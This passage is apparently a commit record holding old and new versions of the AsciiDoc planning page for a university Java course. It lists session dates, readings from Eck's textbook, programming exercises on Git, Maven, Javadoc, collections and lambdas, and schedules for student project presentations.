https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git] in this course. Your GitHub username and git `user.name` must be identical (and for all exercices to come as well). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Git-Br.adoc[Git-Br] (8h32 to 8h52).\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven], and *exercices* (TODO home: Modern project)\n* Two major principles of software engineering: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Contrat\/presentation.pdf[contract] and fail-fast.\n** Mechanisms: interface; black box; preconditions and postconditions; javadoc; exceptions\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES3.7] Exceptions (except 3.7.3)\n** ES4 Subroutines, lambdas, packages, javadoc.\n** ES4.2.4 Member Variables [I]\n** ES4.3 intro to 4.3.2, 4.7.1 Preconditions and Postconditions [I]\n** Javadoc: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours3.pdf[Airiau C3], p. 12 to 19.\n** http:\/\/math.hws.edu\/javanotes\/c4\/quiz.html[EQ4]\n** https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Assert\/presentation.pdf[assertions] (advanced)\n** Illustration: ES4.7.2 A Design Example\n* Javadoc in Eclipse: `Source` \/ `Generate Element Comment` (on methods and classes!), use the `Javadoc` view\n* Append `throw IllegalArgumentException` (for example) on your method header when you want to raise attention to it, and document it in Javadoc\n* *Exercices:*\n** Comment several methods with Javadoc, including the exceptions\n** Find out how you can find, when your program crashes because of an exception, the exact place where the exception was raised and which call caused the crash\n** http:\/\/math.hws.edu\/javanotes\/c4\/exercises.html[EE4.1], 4.2\n** EE4.3, 4.4 [I] (TODO home)\n** EE4.7\n\n[[S4]]\n=== S4 (5 March)\n\n* Graded exercice using your knowledge from Shell; Execution; EE2.x; EE3.x (see above). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Ex\u00e9cution\/Print%20exec.adoc[Print exec]. (13h47 to 14h47)\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Objets\/presentation.pdf[Objets]\n** http:\/\/math.hws.edu\/javanotes\/c5\/[ES5] intro to 5.4\n* *Exercices:*\n** http:\/\/math.hws.edu\/javanotes\/c5\/exercises.html[EE5.1], 5.2\n** EE5.3 [I]\n\/\/ ** Supplementary requirement: you will archive `PairOfDice` and `StatCalc` into a JAR file and use this in a new Eclipse project where only one class is defined, which uses `PairOfDice` and `StatCalc`. Commit both projects into your repository (in two separate folders). The structure of your git repository should be as follows. Please follow the exact naming scheme.\n\/\/ ** `project43\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project47\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project53utils\/`\u2026 (contains `utils.jar` and `src\/` with `PairOfDice` and `StatCalc` inside a sub-folder of it)\n\/\/ ** `project53main\/`\u2026 (contains `src\/` with you main method)\n\/\/* You may use the `groupId` `io.github.<yourgithubusername>`.\n** EE5.4, EE5.5: Play Blackjack!\n\n[[S5]]\n=== S5 (18 March)\n\n* Graded programming exercice\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/JUnit.adoc[Unit testing]\n* Inheritance: Object; print an object; more polymorphism.\n* Generics and https:\/\/www.scientecheasy.com\/2018\/09\/collection-hierarchy-in-java.html[collections].\n** For this course, use by default: `ArrayList` \/ `ImmutableList`; `LinkedHashSet` \/ `ImmutableSet`; `LinkedHashMap` \/ `ImmutableMap`.\n* Exceptions: checked and unchecked\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Search%20path\/README.adoc[Search path] (packages, classes and directories).\n* Java Interfaces and the Calculator example: replaceability and use as type\n\/\/* Exceptions in Java: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours5.pdf[Airiau C5] (and see slides Contrat, appendix)\n\n* https:\/\/www.youtube.com\/watch?v=lcYkOh4nweE&t=1m21s[Mars Climate Orbiter] (1m21 to 5m18; small mistake in the video: it\u2019s Newton times second, not Newton force per second; see also https:\/\/en.wikipedia.org\/wiki\/Mars_Climate_Orbiter[Wikipedia]; similarly http:\/\/www-users.math.umn.edu\/~arnold\/disasters\/ariane.html[sad] https:\/\/www.youtube.com\/watch?v=gp_D8r-2hwk[story]{emptyattribute})\n\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/javanotes8\/c5\/[ES5.5] to 5.8\n* http:\/\/math.hws.edu\/javanotes8\/c10\/[ES10] to 10.2\n\/\/ simple inheritance (no TextIO depended on, actually), but complex set up\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.4] (use `Scanner` instead of `TextIO`)\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4] \n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (you may use standard input instead of file input)\n\/\/ set (long)\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/exercises.html[EE10.2]\n\n*Exercices*\n\n* Write an interface `Calculator` with a method `add` that takes two integers as parameters. Write a method `tester` in a different class that receives a calculator as a parameter and check that `add(2, 3)` gives 5. Write a `SimpleCalculator` that uses the normal Java addition (\u201c+\u201d) to implement `Calculator`.\n\/\/interfaces with generics\n* Implement a `Predicate<String>` to represent a function that associates to a String the value `true` iff its length is even.\n* Define a class `Pair<T1, T2>` to store an ordered pair of objects of type `T1` and `T2`.\n\/\/ implements but no inheritance\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.7] [I] (the part about anonymous classes is optional)\n\/\/** Supplementary requirements: your code must lie in at least two packages;\n\/\/** The idea of this exercice is that you simulate that three different people work on this exercice: one provides some interfaces; another implements the interfaces; a third one uses the interfaces and their implementations to solve the exercice (except you represent all these persons).\n\/\/** Declare at least one interface in another Eclipse project, exported as a Java archive (JAR file);\n\/\/** implement those interfaces in another Eclipse project, exported as a Java archive (JAR file) (will you need the previous JAR file? Why \/ why not?);\n\/\/** solve the exercices in a third Eclipse project (will you need the previous JAR files? Which ones and why?).\n\/\/ read, sort a list\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.1], 7.5 (except that you can use built-sorting functions from the Java API).\n* A class E1 that asks the end-user for a set of integer values. The user enters 0 to stop entering values. Store these values in a Set of Integer values (discarding duplicates). Do it again, obtaining a second set. Then print each set of values entered, then the union of both sets. For example, if the user enters 3, 4, 2, 0, then 1, 1, 2, 5, 0, it prints: 3, 4, 2, then 1, 2, 5, then 3, 4, 2, 1, 5. Use Java sets and interfaces appropriately. [I]\n\n*Todo*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#configuration[Tools]: use correct Eclipse config. (Check warnings, compile errors, instructions!)\n* Commit mandatory exercices https:\/\/classroom.github.com\/a\/X7DXDNfU[here].\n\n[[S6]]\n=== S6 (Wednesday 17th of April, 2019)\n\n*Lecture*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/Maven[Maven]\n* Use https:\/\/mvnrepository.com\/artifact\/com.google.guava\/guava\/27.1-jre[Guava] `https:\/\/github.com\/google\/guava\/wiki\/PreconditionsExplained[Preconditions]#checkArgument`\n* Overload `toString()`: use Guava https:\/\/guava.dev\/releases\/snapshot\/api\/docs\/com\/google\/common\/base\/MoreObjects.ToStringHelper.html[`MoreObjects`]\n* null (started)\n* Correct E1\n.. d\u00e9coup\u00e9 en sous-routines ?\n.. contrat g\u00e9n\u00e9ral (Collection au lieu de LinkedList) ?\n.. noms complets de classes uniques ?\n.. structures appropri\u00e9es ? (Set)\n.. r\u00e9utilisation si on demande les nombres diff\u00e9remment ? (Lus depuis fichiers)\n.. nommage appropri\u00e9 ? (searchNumber renvoie boolean, non, devrait poser une question: isIn)\n.. documentation javadoc lorsque n\u00e9cessaire ?\n.. utilisation ad\u00e9quate des structures ? (ne pas rechercher un nombre dans une liste)\n.. conventions respect\u00e9es ? (noms de variables et m\u00e9thodes en camelCase, de classes en PascalCase, de packages en minuscules, \u2026)\n.. m\u00e9thodes d\u2019instance (et pas statiques) ?\n.. pas de commentaires inutiles (tq auto-g\u00e9n\u00e9r\u00e9s \/\/TODO, @author vide, \u2026)\n.. (micro) pas de comparaison \u00e0 `true` (`if(isBig == true)`)\n.. vous arrivez \u00e0 voir le r\u00e9sultat de votre code javadoc (exemple: `@param truc of type String` inutile)\n* Maps, Comparable, Comparator (voir aussi diapos Airiau)\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/[ES10.3] to 10.5\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c8\/[ES8] intro to 8.4\n\n*Exercices*\n\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.1]\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4]\n\n[[S7]]\n=== S7 (Friday 19th of April, 2019)\n\n* No plagiarism (but reuse!)\n* Static factory method\n** A static method\n** Produces the type of the class it belongs to\n** Serves as a factory\n** Examples: `String.valueOf(true);`, `Integer.valueOf(3);`, `ImmutableList.of();`, `String.link:https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\/java.base\/java\/lang\/String.html#format(java.lang.String,java.lang.Object...)[format](\"Person name: %s, id: %d\", name, id);`\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/arguments.html[Varargs]\n* Files and https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Flows.adoc[flows]\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Resources.adoc[Resources]; exercice: read a file from the class path.\n* Primitive types (autoboxing); optional; give guarantees: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Null.adoc[Best practices]\n\n*Exercices*\n\n* Implement an interface `EasyMap` with two methods: a method that puts a pair of key and value of your choice into a map, and a method that returns an `Optional` containing the value corresponding to the given key (parameter of the method) or that returns an empty `Optional` if there is no such value. Implement this interface in a class `EasyMapImpl`. Provide a static factory method in the interface `EasyMap`. Minimize the number of lines of code (but not at the price of readability). Note that this exercice implements the https:\/\/en.wikipedia.org\/wiki\/Forwarding_(object-oriented_programming)[forwarding] pattern.\n** Define `MyComparator`, a class that implements a comparator over your values. Add a third method to `EasyMap`, that returns a list of values ordered by that comparator.\n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (do not use the provided method: split words at space character; use standard file IO instead of TextIO)\n\n*Todo*\n\n* Read https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#eclipse[Eclipse] doc (or equivalent for your IDE of choice)\n* Make sure you can see the javadoc of the JDK and of the libraries you add through Maven through your IDE, for coding efficiently\n* If you use an IDE different than Eclipse, you are supposed to adjust your parameters to match the configuration provided for Eclipse (see Tools.adoc).\n\n[[S8]]\n=== S8 (Monday 6th of May, 2019)\n\n* Questions?\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Extractor.adoc[exercice]\n** Submitted code must be clean: well-formatted, clear, well named, \u2026\n** Must compile using Maven (otherwise, no point awarded)\n** No warning given by Eclipse\n** 15h44 to 16h24\n* Choose your https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Projets.adoc[project]\n* Comparing Persons, revisited, using https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Lambda Expressions]\n* Override `equals` and `hashcode`\n\n[[S9]]\n=== S9 (Friday 10th of May, 2019)\n\n* Tentative coefficients: graded quizz: 0.5, Extractor: 0.5, next graded exercices: 1, last graded exercice: 2\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/DevOps\/CI.adoc[CI]: Travis\n* TODO : livraison 1 avant fin de la veille de S10.\n\n[[S10]]\n=== S10 (Monday 20th of May, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Dep-Git.adoc[exercice] (about Maven dependencies and Git)\n* https:\/\/stackoverflow.com\/questions\/28972893\/what-is-exception-wrapping-in-java[Wrapping] exceptions\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Log\/README.adoc[Logging]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Annotations\/presentation.pdf[Annotations]\n\n[[S11]]\n=== S11 (Thursday 23rd of May, 2019)\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/SWT[SWT]\n\n[[S12]]\n=== S12 (Friday 24th of May, 2019)\n\n* Back to https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Method references]\n* TODO : livraison suivante avant fin de la veille de la prochaine s\u00e9ance.\n\n[[S13]]\n=== S13 (Tuesday 4th of June, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/JUnit.adoc[exercice]: unit tests \/ access resources through class path \/ continue Extractor.\n** 17h17 to 17h42 (5 min for delays due to GitHub)\n\n* Write the list of PRs for Iteration 2 for each sub-team in `README.adoc` in your `dev` branch.\n\n[[S14]]\n=== S14 (Wednesday 5th of June, 2019)\n\n* Licenses and philosophy: https:\/\/www.gnu.org\/philosophy\/philosophy.html[GNU]; https:\/\/opensource.org\/[OSI]; Copyleft (GNU https:\/\/opensource.org\/licenses\/GPL-3.0[GPL]); Non-copyleft (https:\/\/opensource.org\/licenses\/MIT[MIT])\n* Parsing HTML: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/HTML%20to%20DOM.adoc[DOM]\n* Accessing REST web services: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/WS%20client\/JAX-RS%20client.adoc[JAX-RS client]\n\n[[S15]]\n=== S15 (Monday 17th of June, 2019)\n\n* Work on project\n* TODO : livraison 3 avant fin du jeudi 20, avec PRs affect\u00e9es \u00e0 une Milestone \u00ab\u202fIt\u00e9ration 3\u202f\u00bb (merci \u00e0 l\u2019\u00e9quipe Assisted Board Games pour cette astuce).\n\n[[S16]]\n=== S16 (Friday 21st of June, 2019)\n\n* Work on project\n* TODO : livraison 4 avant fin du vendredi 28, avec PRs affect\u00e9es \u00e0 une Milestone \u00ab\u202fIt\u00e9ration 4\u202f\u00bb.\n** Facultatif : une t\u00e2che qui ajoute dans votre README des \u00e9l\u00e9ments que vous d\u00e9sirez que je prenne en compte dans mon \u00e9valuation globale (difficult\u00e9s rencontr\u00e9es, travaux que j\u2019aurais oubli\u00e9 d\u2019\u00e9valuer lors d\u2019une it\u00e9ration pr\u00e9c\u00e9dente, \u2026). Compl\u00e9mentez vos propos d\u2019\u00e9l\u00e9ments v\u00e9rifiables (commits, documents, \u2026).\n** Remise autoris\u00e9e jusqu\u2019\u00e0 la fin du samedi 29 si n\u00e9cessaire, mais une prime sera accord\u00e9e pour une remise le vendredi soir.\n* Pr\u00e9sentation avant fin du dimanche 30 directement sur branche master, dans `Doc\/Pr\u00e9sentation 2019.pdf`.\n\n[[S17]]\n=== S17 (Monday 1st of July, 2019)\n\n* Pr\u00e9sentations : \nhttps:\/\/github.com\/13tomoore\/J-Confs\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Confs], \nhttps:\/\/github.com\/Amioplk\/Apartments\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Apartments], \nhttps:\/\/github.com\/CHARLONCyril\/2D-Library\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[2D Library], \nhttps:\/\/github.com\/busychess\/Assisted-Board-Games\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Assisted Board Games], \nhttps:\/\/github.com\/j-voting\/J-Voting\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Voting]\n** Code & diapos sur ordinateur de pr\u00e9sentation\n** 15 \u00e0 30 minutes\n** Not\u00e9 : int\u00e9r\u00eat pour l\u2019audience ; compr\u00e9hension par l\u2019audience du contexte et de l\u2019objectif du projet ; compr\u00e9hension par l\u2019audience de l\u2019architecture du code et des aspects techniques ; distinction claire des fcts d\u00e9j\u00e0 pr\u00e9sentes VS ajout\u00e9es ; originalit\u00e9 & cr\u00e9ativit\u00e9 \u00e9ventuelle ; \u2026\n* Votes\n* Evals, and https:\/\/github.com\/oliviercailloux\/projets\/blob\/master\/Licences\/Licence.adoc[Licences]: https:\/\/github.com\/oliviercailloux\/projets\/raw\/master\/Licences\/Declaration%20of%20licensing.odt[Decl]\n\n","old_contents":"= Planning\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThe entry page of the Java course in L3.\n\n== Prerequisites\nYou know algorithmics and, preferrably, the basic syntax of Java (or a related language). If you have followed an algorithmics course with illustrations and exercices in Java, you satisfy the prerequisites.\n\n== Abbreviations\n\n* [I]: Important\n* [O]: Optional (do it if you are specifically interested in the related aspect)\n* ESx.y (or ESx.y.z): designates section x.y (or x.y.z) in Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book] (in chapter x)\n* EQx: quiz chapter x\n* EQx.y: question number y in Eck\u2019s book, from quiz chapter x\n* EEx.y: exercice number y in Eck\u2019s book, from exercices chapter x\n* Ranges are always given with ends included (EQ1.3 to 1.9 means 3 and 9 included)\n* Markers apply to the whole line. Example: \"4.3 intro to 4.3.2, 4.6.1 [I]\" means that everything in between 4.3 and 4.3.2 plus 4.6.1 are important.\n\n== General references\n* Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book]\n* St\u00e9phane Airiau\u2019s https:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/[course] (in French)\n* The https:\/\/app.gosoapbox.com\/event\/290081765\/[confusion barometer]\n* https:\/\/pixees.fr\/informatiquelycee\/[Site] de David Roche\n\n=== Take notes\n* 5 ways of taking notes https:\/\/www.youtube.com\/watch?v=AffuwyJZTQQ[video]\n* https:\/\/doi.org\/10.1177\/0956797614524581[Research] shows that taking notes, and especially writing what is said in your own words after some mental processing, permits more effective study\n\nLinks taken from the https:\/\/www.edx.org\/bio\/eric-s-lander[course] \u201cIntroduction to Biology - The Secret of Life\u201d, MITx\n\/\/www.edx.org\/course\/introduction-to-biology-the-secret-of-life-4, www.edx.org\/course?search_query=introduction%20to%20biology%20-%20the%20secret%20of%20life&level=introductory\n\n== Planning\n\n[[S1]]\n=== S1 (5 & 6 Feb 2020)\n\n*First half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Pr%C3%A9sentation%20du%20cours%20Objet\/presentation.pdf[Pres course]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Syntaxe\/presentation.pdf[Syntax] (without classes and objects) [Should be known or easy]\n* *Exercice* with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/jshell.html[jshell] (or https:\/\/tryjshell.org\/[online]):\n** Assign 4659 and 23 to variables, and show the result of multiplying these variables\n** Show the greatest divisor of 4659 that is different than 4659 (use the `%` operator and a loop)\n** Define a method that accepts an integer parameter and returns its greatest divisor except itself; use it to show the greatest divisor of 4659.\n** Going beyond: https:\/\/arbitrary-but-fixed.net\/teaching\/java\/jshell\/2017\/12\/14\/jshell-peculiarities.html[The peculiarities of the JShell]\n* Syntax (end): classes (no objects)\n** Material: http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.4] (Building blocks of programs), 2 intro (names and things), 2.1 (basic Java application), 2.2 (variables and primitive types), 2.3.3 (operations on strings), 2.4.1 (basic and formatted output), 2.5 (expressions), 2.6.7 (packages), ES3 intro to 3.6 (blocks, loops, algorithmic development, switch) [Should be known or easy]\n** http:\/\/math.hws.edu\/javanotes\/c2\/[ES2.2.1] (variables), 2.3.1 (subroutines), 2.4.6 (scanner for input) [I]\n** ES1.6 (modern UI), 1.7 (internet) [O]\n* *Exercice* with a text editor: define a class `MyMathClass` containing the method above and a method that returns the smallest divisor (greater than one) of its parameter; and a class `MyBooleanClass` containing a method `xor` returning `true` iff exactly one of its parameter is `true`. Copy-paste this in jshell and make sure you can call all these methods from jshell. (TODO home)\n\n*Todo*\n\n* Install a https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Various.adoc#installing-the-jdk[JDK] from OpenJDK (11 or ulterior)\n* Install https:\/\/www.eclipse.org\/downloads\/packages\/[Eclipse IDE] \u201cfor Java Developers\u201d\n* Install https:\/\/git-scm.com\/download[git]\n* Redirect your e-mails @ Dauphine if necessary to ensure you receive announcements posted on MyCourse\n\n*Second half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Ex%C3%A9cution\/presentation.pdf[Ex\u00e9cution]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.1] (machine language), 1.2 (Asynchronous events), 1.3 (JVM)\n* *Exercices* (TODO home):\n** Add a `main` method to your `MyBooleanClass` that prints \u201cHello, this is my boolean class.\u201d Use `System.out.println(\"\u2026\")` to print.\n** Add a `main` method to you `MyMathClass` that accepts two arguments that can each be either `\"true\"` or `\"false\"`; the method calls your `xor` method with the corresponding parameters and prints the result.\n** Compile `MyBooleanClass` with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/javac.html[javac], move the resulting file into its own folder, execute it from the source folder.\n** Find out _in the official documentation_ how to compile the class and let the resulting class be placed in its own folder, in a single step (without you having to move the file afterwards)\n** Compile `MyMathClass`, move the resulting file into its own folder (alone), and execute it from the source folder. Why does it fail? What does the error message indicate, and how is it related to the problem? Fix the problem and execute it, first by grouping the class files, second, while keeping both class files in different folders.\n** (link:http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.1] to 2.2, supposedly known)\n** http:\/\/math.hws.edu\/javanotes\/c1\/quiz.html[EQ1.3] to 1.9\n** http:\/\/math.hws.edu\/javanotes\/c2\/quiz.html[EQ2.1] to 2.4; 2.6 to 2.9; 2.11\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.5] (objects), 2.3.2 (classes and objects)\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.3] to 2.6*; use Scanner, not TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]*: use user input (Scanner) instead of file input; do not use TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3*\n** *EE3.4, 3.6 [I]*\n** EE3.8, 3.9 [O]\n\n[[S2]]\n=== S2 (28 Feb)\n\n* Supposed known: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git]; https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Shell.adoc[Shell]; Execution (see above).\n* Reminder: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** Two roles of classes; static VS instance methods (whose behavior depends on values of parameters and instance attributes)\n* Note about packages (for using `Scanner`)\n** Class has a short name and a package, hence, a long name. (And two file names!)\n* *Exercices* (TODO home):\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.2] to 2.6; use Scanner, not TextIO\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]; use user input (Scanner) instead of file input; do not use TextIO\n** http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3\n** EE3.4, 3.6 [I]\n* Eclipse & Java:\n** Use Outline view\n** Use Problems view\n** Use Javadoc view\n** Content completion with CTRL+Space\n** Organize imports: from an editor, select `Source` \/ `Organize Imports`\n** In the http:\/\/help.eclipse.org\/latest\/topic\/org.eclipse.jdt.doc.user\/gettingStarted\/qs-2.htm[Basic tutorial], read: Creating a Java Class; Renaming Java elements; Navigate to a Java element's declaration; Viewing the type Hierarchy; Running your programs\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven]: Introduction\n** Exercice: *Import a Maven project into Eclipse*\n\n[[S3]]\n=== S3 (4 March)\n\n* Graded exercice similar to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Dep-Git.adoc[Dep-Git] and similar to the exercices related to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git] in this course. Your GitHub username and git `user.name` must be identical (and for all exercices to come as well). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Git-Br.adoc[Git-Br] (8h32 to 8h52).\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven], and *exercices* (TODO home: Modern project)\n* Two major principles of software engineering: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Contrat\/presentation.pdf[contract] and fail-fast.\n** Mechanisms: interface; black box; preconditions and postconditions; javadoc; exceptions\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES3.7] Exceptions (except 3.7.3)\n** ES4 Subroutines, lambdas, packages, javadoc.\n** ES4.2.4 Member Variables [I]\n** ES4.3 intro to 4.3.2, 4.7.1 Preconditions and Postconditions [I]\n** Javadoc: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours3.pdf[Airiau C3], p. 12 to 19.\n** http:\/\/math.hws.edu\/javanotes\/c4\/quiz.html[EQ4]\n** https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Assert\/presentation.pdf[assertions] (advanced)\n** Illustration: ES4.7.2 A Design Example\n* Javadoc in Eclipse: `Source` \/ `Generate Element Comment` (on methods and classes!), use the `Javadoc` view\n* Append `throw IllegalArgumentException` (for example) on your method header when you want to raise attention to it, and document it in Javadoc\n* *Exercices:*\n** Comment several methods with Javadoc, including the exceptions\n** Find out how you can find, when your program crashes because of an exception, the exact place where the exception was raised and which call caused the crash\n** http:\/\/math.hws.edu\/javanotes\/c4\/exercises.html[EE4.1], 4.2\n** EE4.3, 4.4 [I] (TODO home)\n** EE4.7\n\n[[S4]]\n=== S4 (5 March)\n\n* Graded exercice using your knowledge from Shell; Execution; EE2.x; EE3.x (see above). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Ex\u00e9cution\/Print%20exec.adoc[Print exec]. (13h45 to 14h45)\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Objets\/presentation.pdf[Objets]\n** http:\/\/math.hws.edu\/javanotes\/c5\/[ES5] intro to 5.4\n* *Exercices:*\n** http:\/\/math.hws.edu\/javanotes\/c5\/exercises.html[EE5.1], 5.2\n** EE5.3 [I]\n\/\/ ** Supplementary requirement: you will archive `PairOfDice` and `StatCalc` into a JAR file and use this in a new Eclipse project where only one class is defined, which uses `PairOfDice` and `StatCalc`. Commit both projects into your repository (in two separate folders). The structure of your git repository should be as follows. Please follow the exact naming scheme.\n\/\/ ** `project43\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project47\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project53utils\/`\u2026 (contains `utils.jar` and `src\/` with `PairOfDice` and `StatCalc` inside a sub-folder of it)\n\/\/ ** `project53main\/`\u2026 (contains `src\/` with you main method)\n\/\/* You may use the `groupId` `io.github.<yourgithubusername>`.\n** EE5.4, EE5.5: Play Blackjack!\n\n[[S5]]\n=== S5 (18 March)\n\n* Graded programming exercice\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/JUnit.adoc[Unit testing]\n* Inheritance: Object; print an object; more polymorphism.\n* Generics and https:\/\/www.scientecheasy.com\/2018\/09\/collection-hierarchy-in-java.html[collections].\n** For this course, use by default: `ArrayList` \/ `ImmutableList`; `LinkedHashSet` \/ `ImmutableSet`; `LinkedHashMap` \/ `ImmutableMap`.\n* Exceptions: checked and unchecked\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Search%20path\/README.adoc[Search path] (packages, classes and directories).\n* Java Interfaces and the Calculator example: replaceability and use as type\n\/\/* Exceptions in Java: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours5.pdf[Airiau C5] (and see slides Contrat, appendix)\n\n* https:\/\/www.youtube.com\/watch?v=lcYkOh4nweE&t=1m21s[Mars Climate Orbiter] (1m21 to 5m18; small mistake in the video: it\u2019s Newton times second, not Newton force per second; see also https:\/\/en.wikipedia.org\/wiki\/Mars_Climate_Orbiter[Wikipedia]; similarly http:\/\/www-users.math.umn.edu\/~arnold\/disasters\/ariane.html[sad] https:\/\/www.youtube.com\/watch?v=gp_D8r-2hwk[story]{emptyattribute})\n\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/javanotes8\/c5\/[ES5.5] to 5.8\n* http:\/\/math.hws.edu\/javanotes8\/c10\/[ES10] to 10.2\n\/\/ simple inheritance (no TextIO depended on, actually), but complex set up\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.4] (use `Scanner` instead of `TextIO`)\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4] \n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (you may use standard input instead of file input)\n\/\/ set (long)\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/exercises.html[EE10.2]\n\n*Exercices*\n\n* Write an interface `Calculator` with a method `add` that takes two integers as parameters. Write a method `tester` in a different class that receives a calculator as a parameter and check that `add(2, 3)` gives 